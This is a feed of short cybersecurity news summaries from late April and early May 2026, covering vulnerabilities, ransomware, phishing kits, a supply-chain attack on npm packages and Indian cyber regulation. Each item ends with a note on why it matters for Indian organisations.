General
High
1 May
The Cyber Express weekly roundup details significant cybersecurity developments across healthcare, public administration, and digital platforms. It highlights major data breaches, a high-impact AI operational failure, and large-scale phishing campaigns. These incidents reflect the increasing scale and sophistication of cyber threats, leveraging social engineering and systemic weaknesses. Source: The Cyber Express
Why it matters: Indian organizations must remain vigilant against evolving data breach tactics, AI-related risks, and sophisticated phishing campaigns to protect critical data and infrastructure.
General
Critical
1 May
Wireshark has released a critical security update addressing over 40 vulnerabilities. Several flaws allow arbitrary code execution via malformed packet injection or malicious capture files. Organizations using Wireshark for network monitoring and forensics must update to version 4.6.5 immediately. Source: Cybersecurity News
Why it matters: Indian critical infrastructure operators and security teams must promptly update Wireshark to mitigate severe arbitrary code execution risks in their network analysis tools.
General
High
1 May
Two former cybersecurity incident response employees received four-year prison sentences for their involvement in BlackCat (ALPHV) ransomware attacks targeting US companies. These individuals, previously with Sygnia and DigitalMint, were found to have facilitated the attacks. Their sentencing highlights the legal risks for those complicit in ransomware operations, even in negotiation roles. Source: BleepingComputer
Why it matters: This case underscores the severe legal repercussions for individuals involved in ransomware activities, serving as a critical reminder for Indian organizations to maintain robust defenses and scrutinize third-party incident response services.
General
High
1 May
The article recommends that India's National Disaster Management Authority (NDMA) test the cyber defense capabilities of the nation's critical infrastructure. This proactive measure is essential for ensuring preparedness against any potential cyber eventualities. Such drills would strengthen India's resilience in the face of evolving cyber threats. Source: Tatsatchronicle
Why it matters: Indian critical infrastructure operators should heed this call for enhanced cyber defense testing and integrate comprehensive drills into their security strategies to protect vital national assets.
General
Critical
1 May
A critical vulnerability was discovered in the Gemini Command Line Interface. This flaw could enable attackers to execute arbitrary code on host systems by planting malicious configurations. The vulnerability also posed a significant risk for supply chain attacks, allowing commands to run outside the intended sandbox environment. Source: Security Week
Why it matters: Indian organizations using Gemini CLI must immediately assess their systems for this critical vulnerability and apply any available patches to prevent host code execution and supply chain attacks.
General
Critical
1 May
Qilin ransomware, a prominent cyber threat, has evolved its tactics since its 2022 emergence. The group now enumerates Remote Desktop Protocol (RDP) authentication history on compromised servers. This new technique allows Qilin to quickly and stealthily map target networks. Source: Cybersecurity News
Why it matters: Indian organizations must enhance RDP security, implement multi-factor authentication, and monitor for suspicious RDP activity to mitigate this advanced ransomware threat.
General
Critical
1 May
Artificial intelligence is significantly enhancing the scale, speed, and success of cybercrime, leading to industrialized attacks. The time available for organizations to patch or respond to vulnerabilities before exploitation has drastically reduced to mere hours. Cybersecurity defenders must urgently leverage AI and automation to effectively counter these rapidly evolving and sophisticated threats. Source: Security Week
Why it matters: Indian critical infrastructure operators must urgently enhance their defensive capabilities with AI and automation to counter rapidly evolving, industrialized cyber threats and shrinking exploit windows.
Transport
High
1 May
The FBI has issued a warning regarding a significant increase in cyber-enabled cargo theft, primarily targeting the transportation and logistics industry. This trend is projected to cause substantial financial losses, estimated at nearly $725 million in the United States and Canada by 2025. Cybercriminals are increasingly leveraging digital methods to facilitate the physical theft of […]
Why it matters: Indian transportation and logistics companies must enhance cybersecurity defenses and supply chain vigilance to mitigate similar global cyber-enabled cargo theft risks.
General
High
1 May
A new phishing kit named Bluekit has been identified, offering over 40 templates designed to target various popular online services. This service incorporates basic AI features to assist threat actors in generating campaign drafts, streamlining the creation of malicious phishing emails. The combination of AI and a broad template library significantly enhances the efficiency and […]
Why it matters: Indian organisations must enhance their phishing detection capabilities and employee training to counter the increased sophistication enabled by AI-powered phishing kits like Bluekit.
General
High
30 Apr
A new supply chain attack, dubbed Mini Shai-Hulud, is actively targeting SAP NPM packages. This sophisticated attack utilizes a preinstall hook to fetch and execute a Bun binary, effectively bypassing existing security monitoring solutions. The method allows for unauthorized code execution, posing a significant risk to affected systems. Source: Security Week
Why it matters: Indian organizations leveraging SAP products and NPM packages must enhance their supply chain security measures to detect and prevent such stealthy intrusions.
General
High
30 Apr
New research reveals that attackers begin scanning newly deployed assets within minutes of them going live. Automated attacks can progress from initial discovery to full compromise in under 24 hours. This highlights the critical need for immediate security hardening and monitoring of all new infrastructure. Source: BleepingComputer
Why it matters: Indian organizations must implement robust security-by-design principles and immediate post-deployment security checks to mitigate the rapid exploitation window for new assets.
General
High
30 Apr
The April 2026 KB5083769 security update for Windows 11 is causing significant issues. It is reported to break third-party backup applications on systems running Windows 11 24H2 and 25H2. This defect compromises data recovery capabilities and operational resilience for affected organizations. Source: BleepingComputer
Why it matters: Indian critical infrastructure operators must exercise caution with this Windows 11 update, as backup failures could severely impact incident recovery and business continuity.
General
High
30 Apr
Cybersecurity researchers have detailed DEEP#DOOR, a stealthy Python-based backdoor framework. This backdoor establishes persistent access and harvests sensitive browser and cloud credentials from compromised Windows hosts. The intrusion chain begins by disabling Windows security controls via a batch script. Source: The Hacker News
Why it matters: Indian organizations must update security controls, monitor for DEEP#DOOR indicators, and educate users to prevent credential theft and unauthorized access.
General
High
30 Apr
Governments globally are sounding alerts over data privacy and surveillance risks posed by foreign AI tools. India has enacted the Digital Personal Data Protection Act, 2023, to address these specific challenges. This law provides a framework for managing personal data and mitigating potential risks from AI tool usage. Source: Msn
Why it matters: Indian organizations must understand and comply with the DPDP Act when deploying foreign AI tools to safeguard sensitive data and avoid regulatory penalties.
General
High
30 Apr
India's data protection framework has transitioned from high-level legislation to detailed, actionable rules. This shift is generating sustained demand for expertise in privacy governance. Organisations must now focus on implementing robust incident management strategies to ensure compliance. Source: Legalbusinessonline
Why it matters: Indian organisations must proactively update their privacy governance and incident response protocols to align with these detailed and evolving data protection regulations.
Banking
High
30 Apr
The Indian Banks' Association (IBA) is initiating discussions with banks to evaluate potential risks posed by Anthropic's Mythos AI model. India's Computer Emergency Response Team (CERT-In) has also engaged with bankers regarding this issue. Financial institutions are reportedly considering enlisting global technology firms like Microsoft and IBM to aid in this critical risk assessment. Source: […]
Why it matters: This proactive assessment by Indian banking bodies and CERT-In underscores the importance for all Indian critical infrastructure operators to evaluate and manage cybersecurity risks associated with emerging AI technologies.
General
Critical
30 Apr
Researchers have identified two critical vulnerabilities in EnOcean SmartServer systems, enabling security bypass and remote code execution. These flaws could allow attackers to remotely compromise building management systems. The discovery highlights the importance of securing OT/IoT devices within critical infrastructure. Source: Security Week
Why it matters: Indian organizations utilizing EnOcean SmartServer or similar building management systems must promptly assess their exposure and implement necessary security measures to prevent remote exploitation.
Banking
High
30 Apr
The Reserve Bank of India and the Finance Ministry are urging Indian banks to significantly enhance their cybersecurity frameworks. This push reflects growing regulatory concerns, potentially driven by advancements in AI and evolving cyber threats. The Indian Computer Emergency Response Team (CERT-In) has also issued related advisories, emphasizing the critical need for stronger cyber defenses […]
Why it matters: This directive requires Indian financial institutions to prioritize and implement robust cybersecurity measures, ensuring compliance with regulatory mandates and safeguarding critical infrastructure against emerging threats.
General
Medium
30 Apr
CERT-In successfully organized 'CERT-In SAMVAAD 2026', a three-day National Annual Conference. The event brought together over 500 delegates to discuss and strengthen India's cybersecurity audit framework. This initiative aims to enhance the nation's overall cyber resilience and security posture. Source: PIB
Why it matters: Indian organizations, especially those in critical infrastructure, should monitor outcomes from CERT-In's conferences as they often shape future audit requirements and best practices.
General
High
30 Apr
CERT-In recently hosted 'SAMVAAD 2026' where India unveiled its next-generation cybersecurity audit framework. This new framework aims to enhance the cybersecurity posture across various sectors. It signifies a proactive step by India to strengthen its digital defenses and compliance standards. Source: Devdiscourse
Why it matters: Indian organizations, especially those in critical infrastructure, must prepare to align their cybersecurity practices with this new national audit framework to ensure compliance and bolster their defenses.